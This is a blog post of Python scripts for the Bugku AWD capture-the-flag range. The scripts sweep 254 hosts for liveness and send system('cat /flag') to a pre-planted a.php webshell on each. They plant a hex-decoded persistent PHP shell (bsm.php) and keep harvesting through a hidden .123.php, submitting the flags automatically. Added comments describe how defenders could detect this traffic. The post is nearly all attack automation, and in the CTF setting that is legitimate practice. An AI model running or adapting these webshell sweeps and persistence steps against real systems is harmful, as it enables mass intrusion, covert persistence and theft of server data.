Bugku手写小脚本(大佬就不用看了,鄙人水平有限)
首先是检测网站存活脚本
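import time
import urllib.error
import urllib.request

# Liveness sweep for the Bugku AWD range: build the list of candidate team
# URLs, persist it to a text file, then request each URL once and print the
# ones that answer with a successful HTTP response.

TARGET_LIST = 'H:/Python3.0Work/AWD/bugkuwz.txt'
PROBE_TIMEOUT = 2  # seconds; without a timeout a single silent host stalls the sweep

opener = urllib.request.build_opener()
# NOTE(review): a fixed, non-browser User-Agent combined with a sequential
# walk over hosts 1..254 is easy to single out in web access logs, which is
# what a defending team should be watching for during the round.
opener.addheaders = [('User-agent', 'Mozilla/49.0.2')]

# Write the candidate list. The with-block closes the handle, so the data is
# flushed before the file is read back (the original left the last handle
# open and could miss the tail of the list).
with open(TARGET_LIST, mode='a+', encoding='utf-8') as new:
    for n in range(1, 255):
        new.write('http://192-168-1-' + str(n) + '.awd.bugku.cn/' + '\n')

# Append mode accumulates entries across runs, so drop duplicates (order is
# kept) and skip blank lines, which would otherwise raise on open().
with open(TARGET_LIST, encoding='utf-8') as file:
    aa = list(dict.fromkeys(
        line.replace('\n', '') for line in file if line.strip()
    ))

print('存活网站如下:')
for tempUrl in aa:
    try:
        opener.open(tempUrl, timeout=PROBE_TIMEOUT).close()
        print(tempUrl)
    except (urllib.error.URLError, OSError):
        # HTTPError is a URLError, and socket timeouts are OSError.
        # NOTE(review): an HTTPError means the server did answer (4xx/5xx);
        # the original does not list such hosts and that behaviour is kept.
        time.sleep(0.5)
    time.sleep(0.1)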
连接预设后门脚本进行一系列操作
from urllib import request
import re
import requests
#连接预留木马进行flag的获取
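def getflag():
    """Collect the output of ``cat /flag`` from every range host via a.php.

    Posts the command in parameter ``a`` to the pre-planted ``a.php`` on
    hosts 1..254 and appends each response body to ``flag.txt``. Hosts that
    fail or time out are skipped.

    Defender view: this traffic is a POST to ``a.php`` whose ``a`` parameter
    contains ``system(``; removing the planted file or rejecting that
    parameter stops the collection.
    """
    url = 'http://192-168-1-{}.awd.bugku.cn/a.php'  # path of the known pre-planted shell
    cmd = {'a': "system('cat /flag')"}  # POST parameter the shell evaluates
    for i in range(1, 255):
        try:
            r = requests.post(url.format(str(i)), data=cmd, timeout=2)
            # Close the handle on every iteration so the data is on disk
            # before intoflag() reads the file.
            # NOTE(review): the body is stored unfiltered, so error pages
            # end up in flag.txt as well.
            with open('H:/Python3.0Work/AWD/flag.txt', mode='a+', encoding='utf-8') as f:
                f.write(r.text)
        except Exception:
            # Best-effort sweep; unlike a bare except this still lets
            # Ctrl-C interrupt the loop.
            continue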
#连接预留木马进行内存马的注入
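def Nodead():
    """Write the persistent PHP file through a.php and request it once.

    For hosts 1..254: posts a command in parameter ``a`` that decodes a
    hex-encoded payload (left as a placeholder in the command string) into
    ``bsm.php``, then fetches ``bsm.php`` and prints the response. Hosts
    that fail or time out are skipped.

    Defender view: the artefacts are a POST to ``a.php`` carrying
    ``system(`` and ``xxd -r``, a newly created ``bsm.php`` in the web
    directory, and a GET for that file right afterwards. File-integrity
    monitoring of the web root and alerting on new ``.php`` files catch it.
    """
    url = 'http://192-168-1-{}.awd.bugku.cn/a.php'  # path of the known pre-planted shell
    cmd = {'a' : "system('echo (注意这里填写十六进制转码后的不死马)|xxd -r -ps > bsm.php')"}  # parameter [a]: writes the persistent file
    for i in range(1, 255):
        try:
            r = requests.post(url.format(str(i)), data=cmd, timeout=1)
            print(r.url+'存在已知木马,已写入不死马请尽快执行不死马')
            # The with-block releases the connection even if decoding fails.
            with request.urlopen('http://192-168-1-'+str(i)+'.awd.bugku.cn/bsm.php', timeout=1) as response:
                res = response.read().decode('utf-8')
            print(res)
        except Exception:
            # Best-effort sweep; unlike a bare except this still lets
            # Ctrl-C interrupt the loop.
            continue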
#提交flag
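def intoflag():
    """Submit every line of flag.txt to the Bugku scoring endpoint.

    Each line has ``{``, ``}`` and the first ``flag`` removed, is stripped
    of surrounding whitespace, URL-encoded and sent as the ``flag`` query
    parameter. The server's reply is printed. A failed submission is
    reported and the remaining lines are still processed.

    The ``token=[ ]`` placeholder must be replaced with the team token
    before use. Because the token travels in the query string and sits in
    this file, treat both the script and any proxy or shell history that
    records the URL as containing a secret.
    """
    from urllib.parse import quote  # local import; file-level imports stay as they are

    # utf-8 matches the encoding getflag() writes with; the with-block closes
    # the file even when a submission raises.
    with open('H:/Python3.0Work/AWD/flag.txt', mode='r', encoding='utf-8') as f:
        for flag in f:
            F3 = flag.replace('{', '').replace('}', '').replace('flag', '', 1).strip()
            if not F3:
                continue  # blank line, nothing to submit
            # The raw line ends in a newline, which urlopen rejects as a
            # control character; stripping and quoting keeps the URL valid.
            submit_url = 'https://ctf.bugku.com/pvp/submit.html?token=[ ]&flag=' + quote(F3, safe='')
            try:
                with request.urlopen(submit_url, timeout=1) as response:
                    res = response.read().decode('utf-8')
                print(res)
            except Exception as exc:
                print('submit failed:', exc)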
if __name__ == '__main__':
    # Order matters: collect flags, submit them, then write the persistent file.
    print('Loading......')
    for step in (getflag, intoflag, Nodead):
        step()
    print('AttackOver!')
持续攻击(连接不死马)
import requests
import re
from urllib import request
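def getflag():
    """Collect the output of ``cat /flag`` from every host via .123.php.

    Posts the command in parameter ``a`` to ``.123.php`` (the location of
    the persistent file) on hosts 1..254 and appends each response body to
    ``flag.txt``. Hosts that fail or time out are skipped.

    Defender view: the file name starts with a dot, so it is hidden from a
    plain directory listing; list the web root with hidden files included
    and look for POSTs to it whose ``a`` parameter contains ``system(``.
    """
    url = 'http://192-168-1-{}.awd.bugku.cn/.123.php'  # location of the persistent file
    cmd = {'a': "system('cat /flag')"}
    for i in range(1, 255):
        try:
            b = requests.post(url.format(str(i)), data=cmd, timeout=1)
            # The with-block closes the handle even if the write raises;
            # the original skipped close() on that path.
            with open('H:/Python3.0Work/AWD/flag.txt', mode='a+', encoding='utf-8') as f:
                f.write(b.text)
        except Exception:
            # Best-effort sweep; unlike a bare except this still lets
            # Ctrl-C interrupt the loop.
            continue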
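def intoflag():
    """Submit every line of flag.txt to the Bugku scoring endpoint.

    Each line has ``{``, ``}`` and the first ``flag`` removed, is stripped
    of surrounding whitespace, URL-encoded and sent as the ``flag`` query
    parameter. The server's reply is printed. A failed submission is
    reported and the remaining lines are still processed.

    The ``token=[ ]`` placeholder must be replaced with the team token
    before use. The token travels in the query string, so anything that
    logs the URL holds a secret.
    """
    from urllib.parse import quote  # local import; file-level imports stay as they are

    # utf-8 matches the encoding getflag() writes with; the with-block closes
    # the file even when a submission raises.
    with open('H:/Python3.0Work/AWD/flag.txt', mode='r', encoding='utf-8') as f:
        for flag in f:
            F3 = flag.replace('{', '').replace('}', '').replace('flag', '', 1).strip()
            if not F3:
                continue  # blank line, nothing to submit
            # The raw line ends in a newline, which urlopen rejects as a
            # control character; stripping and quoting keeps the URL valid.
            submit_url = 'https://ctf.bugku.com/pvp/submit.html?token=[ ]&flag=' + quote(F3, safe='')
            try:
                with request.urlopen(submit_url, timeout=1) as response:
                    res = response.read().decode('utf-8')
                print(res)
            except Exception as exc:
                print('submit failed:', exc)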
if __name__ == '__main__':
    # Follow-up round: collect flags through the persistent file, then submit them.
    print('后续攻击开始展开......')
    for step in (getflag, intoflag):
        step()
    print('AttackOver!')